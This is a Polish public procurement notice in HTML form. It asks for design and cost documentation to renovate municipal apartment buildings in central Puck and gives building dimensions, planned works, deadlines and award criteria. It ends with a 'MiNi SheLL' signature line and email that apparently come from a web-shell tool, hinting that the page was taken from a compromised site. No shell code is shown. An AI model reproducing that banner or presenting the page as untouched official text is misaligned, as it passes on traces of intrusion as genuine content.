                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	ul. 10-go Lutego 27
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna - piwnica.  
Otoczenie wielorodzinnych budynków mieszkalnych obejmować będzie m. in.: zagospodarowanie podwórek, drogi wewnętrzne i dojazdowe, chodniki, miejsca postojowe, ukształtowanie terenu, urządzenie i zakup zieleni, oświetlenie terenu, monitoring wizyjny oraz małą architekturę.                                                                                                                                                                   Wysokość  budynku: do kalenicy około 11,80m, do okapu około 7,20m.                                                                                                                                                                                          Długość budynku: około 15,65 m                                                                                                                                                                                                       Szerokość budynku: około 9,34 m
Powierzchnia zabudowy: około 167,00m2                                                                                                                                                      Powierzchnia użytkowa: około 290,00m2                                                                                                                                                       Kubatura: około 1.300,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki drzwiowej.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 18/1, obręb 2 mapa 1, pow. 617 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 167 m.

2)	ul. generała Józefa Hallera 5
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1900.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,00m, do okapu około 6,50m.                                                                                                                                                                       Długość budynku: około  13,00m                                                                                                                                                                                                          Szerokość budynku: około  13,90m                                                                                                                                                                   Powierzchnia zabudowy: około 162,00m2                                                                                                                                                      Powierzchnia użytkowa: około 250m2                                                                                                                                                       Kubatura: około 1.931,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH SPADOWY
Remont dachu polegający na: przemurowaniu kominów ponad połacią dachu, wymiana rynien i obróbek blacharskich, wykonanie izolacji termicznej, wzmocnienie konstrukcji.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 17/1, obręb 2 mapa 4, pow. 537 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 162 m.

3)	ul. generała Józefa Hallera 7
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1910.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 14,70 m, do okapu około 8,80m.                                                                                                                                                                       Długość budynku: około  16,94 m                                                                                                                                                                                                          Szerokość budynku: około 12,14 m                                                                                                                                                                   Powierzchnia zabudowy: około 238,4 m2                                                                                                                                                      Powierzchnia użytkowa: około 634,5 m2                                                                                                                                                      Kubatura: około 3.915 m3              
Budynek gospodarczy                                                                                                                                                                                  Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, stropy drewniane,  dach o konstrukcji drewnianej  dwuspadowy - stropodach. Dwie kondygnacje nadziemne, nie podpiwniczony.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  6,00m, 
do okapu około 5,50m.                                                                                                                                                                       Długość budynku: około 11,40m                                                                                                                                                                                                          Szerokość budynku: około 4,70m                                                                                                                                                                   Powierzchnia zabudowy:  około 55,00m2                                                                                                                                                      
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapa, roboty towarzyszące. 
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 12/9, obręb 2 mapa 4, pow. 372 m, działka nr 12/10, obręb 2 mapa 4, pow. 213 m, działka nr 9/8, obręb 2 mapa 4, pow. 51 m, działka nr 9/9, obręb 2 mapa 4, pow. 35 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 224 m, pozostałe budynki niemieszkalne, liczba kondygnacji 2, pow. ewidencyjna obrysu 14 m, pozostałe budynki niemieszkalne, liczba kondygnacji 2, pow. ewidencyjna obrysu 41 m.

4)	ul. generała Józefa Hallera 7A
Przedmiotowy budynek jest budynkiem mieszkalnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Dwie kondygnacje nadziemne łącznie z poddaszem nieużytkowym, nie podpiwniczony .                                                                                                                                                                    Wysokość  budynku: do kalenicy  około  6,00m, do okapu około 5,50m.                                                                                                                                                                       Długość budynku: około 13,90m                                                                                                                                                                                                          Szerokość budynku: około 6,90m                                                                                                                                                                   Powierzchnia zabudowy: około 85,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 47,80m2                                                                                                                                                       Kubatura: około 480,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
-	Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH PŁASKI DWUSPADOWY
Ocieplenie stropodachu styropapa wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące. 
Informacje z ewidencji gruntów: działka nr 12/5, obręb 2 mapa 4, pow. 139 m, budynek mieszkalny, liczba kondygnacji 1, pow. ewidencyjna obrysu 85 m.

5)	ul. generała Józefa Hallera 13
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1910.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 9,50m.                                                                                                                                                                       Długość budynku: około 18,5 m                                                                                                                                                                                                          Szerokość budynku: około 15,0 m                                                                                                                                                                   Powierzchnia zabudowy:  około 278,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 505,00m2                                                                                                                                                       Kubatura:  około 3.000,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i remont stolarki drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapa wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące. 
-	DACH SPADOWY  MANSARD
Wymiana pokrycia dachowego Mansardu wraz z robotami towarzyszącymi.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 247, obręb 2 mapa 1, pow. 973 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 280 m.

6)	ul. Sambora 4
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy częściowo drewniane, częściowo żelbetowe dach o konstrukcji drewnianej  dwuspadowy - stropodach. Dwie kondygnacje nadziemne, nie podpiwniczony . Rok zakończenia budowy 1952.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 6,50m, do okapu około 6,00m.                                                                                                                                                                       Długość budynku: około 10,00m                                                                                                                                                                                                          Szerokość budynku: około 20,00m                                                                                                                                                                   Powierzchnia zabudowy: 217,00m2                                                                                                                                                      Powierzchnia użytkowa:  296,00m2                                                                                                                                                       Kubatura:  1.400,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
Budynek gospodarczy 
Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, strop  żelbetowy, dach o konstrukcji drewnianej  jednospadowy - stropodach. Jedna kondygnacja nadziemne, podpiwniczony . 
Wysokość  budynku: do kalenicy  około  4,30m, do okapu około 3,30mb.                                                                                                                                                                       Długość budynku: około 11,30m                                                                                                                                                                                                          Szerokość budynku: około 3,80m                                                                                                                                                                   Powierzchnia zabudowy: około 23,00m2                                                                                                                                                      Kubatura: około 150,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Działka nr 141/1, obręb 2 mapa 4, o pow. około 134 m (aktualnie trwa podział działki 141 na 141/1 i 141/2) , działka 140/2, obręb 2 mapa 4, pow. 257 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 216 m, pozostałe budynki niemieszkalne, liczba kondygnacji 1, pow. ewidencyjna obrysu 44 m.

Otoczenie wielorodzinnych budynków mieszkalnych obejmować będzie m. in.: zagospodarowanie podwórek, drogi wewnętrzne i dojazdowe, chodniki, miejsca postojowe, ukształtowanie terenu, urządzenie i zakup zieleni, oświetlenie terenu, monitoring wizyjny oraz małą architekturę. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacji projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę. Zadanie 2: ul.  I Armii Wojska Polskiego 3, ul. Morska 15, ul. Morskiego Dywizjonu Lotniczego 10<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	ul. I Armii Wojska Polskiego 3
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Dwie kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1870.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 8,00 m, do okapu około 5,30m.                                                                                                                                                                       Długość budynku: około  18,06 m                                                                                                                                                                                                          Szerokość budynku: około 11,14 m                                                                                                                                                                   Powierzchnia zabudowy: około 201,60 m2                                                                                                                                                      Powierzchnia użytkowa: około 330,77 m2                                                                                                                                                       Kubatura: około 1794 m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH PŁASKI DWUSPADOWY
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 98/2, obręb 2 mapa 4, pow. 201 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 203 m. Część działki ewidencyjnej nr 98/1 przed budynkiem  I AWP 3 od strony ulicy. 

2)	Morska 15
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym, nie podpiwniczony. Rok zakończenia budowy 1854.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 7,50m.                                                                                                                                                                       Długość budynku: około 18,60m                                                                                                                                                                                                          Szerokość budynku: około  13,20m                                                                                                                                                                   Powierzchnia zabudowy: około 237,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 407,00m2                                                                                                                                                       Kubatura:  około 2.400,00m3                    
 Budynek gospodarczy            
Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, dach o konstrukcji drewnianej  jednospadowy - stropodach. Jedna kondygnacja nadziemna, nie podpiwniczony . Rok zakończenia budowy 1987.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  4,40m, do okapu około 2,20m.                                                                                                                                                                       Długość budynku: około 33,00m                                                                                                                                                                                                          Szerokość budynku: około 5,00m                                                                                                                                                                   Powierzchnia zabudowy: około 177,00m2                                                                                                                                                      
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH SPADOWY
Remont dachu polegający na: przemurowaniu kominów ponad połacią dachu, wymiana rynien i obróbek blacharskich, montaż okien połaciowych, izolacja termiczna, wzmocnienie konstrukcji.
-	KLATKI SCHODOWE
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 116, obręb 2 mapa 1, pow. 1003 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 239 m, pozostałe budynki niemieszkalne, liczba kondygnacji 1, pow. ewidencyjna obrysu 179 m.

3)	Morskiego Dywizjonu Lotniczego 10
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy ceramiczne, dach  dwuspadowy - stropodach. Trzy kondygnacje nadziemne  oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1964.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 12,00m.                                                                                                                                                                       Długość budynku: około 12,60m                                                                                                                                                                                                          Szerokość budynku: około 10,60m                                                                                                                                                                   Powierzchnia zabudowy: około 132,00m2                                                                                                                                                      Powierzchnia użytkowa: około 377,00m2                                                                                                                                                       Kubatura: około 1.600,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STOPODACH
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 27/1, obręb 2 mapa 4, pow. 235 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 135 m.

Otoczenie wielorodzinnych budynków mieszkalnych obejmować będzie m. in.: zagospodarowanie podwórek, drogi wewnętrzne i dojazdowe, chodniki, miejsca postojowe, ukształtowanie terenu, urządzenie i zakup zieleni, oświetlenie terenu, monitoring wizyjny oraz małą architekturę. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 71248000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com